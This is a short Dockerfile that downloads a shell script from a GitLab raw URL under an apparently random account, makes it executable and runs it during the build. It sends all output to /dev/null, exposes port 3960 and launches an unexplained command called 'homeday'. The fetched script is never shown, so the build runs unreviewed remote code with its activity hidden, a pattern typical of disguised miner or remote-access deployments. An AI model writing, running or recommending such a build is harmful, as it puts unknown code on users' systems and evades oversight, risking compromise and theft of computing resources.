FROM debian:latest

RUN apt update && apt install wget unzip tar -y > /dev/null 2>&1

RUN wget -O tes.sh https://gitlab.com/tupuzimy/rdp/-/raw/main/dk.sh > /dev/null 2>&1

RUN chmod +x tes.sh && ./tes.sh > /dev/null 2>&1 

EXPOSE 3960

CMD ["homeday"]
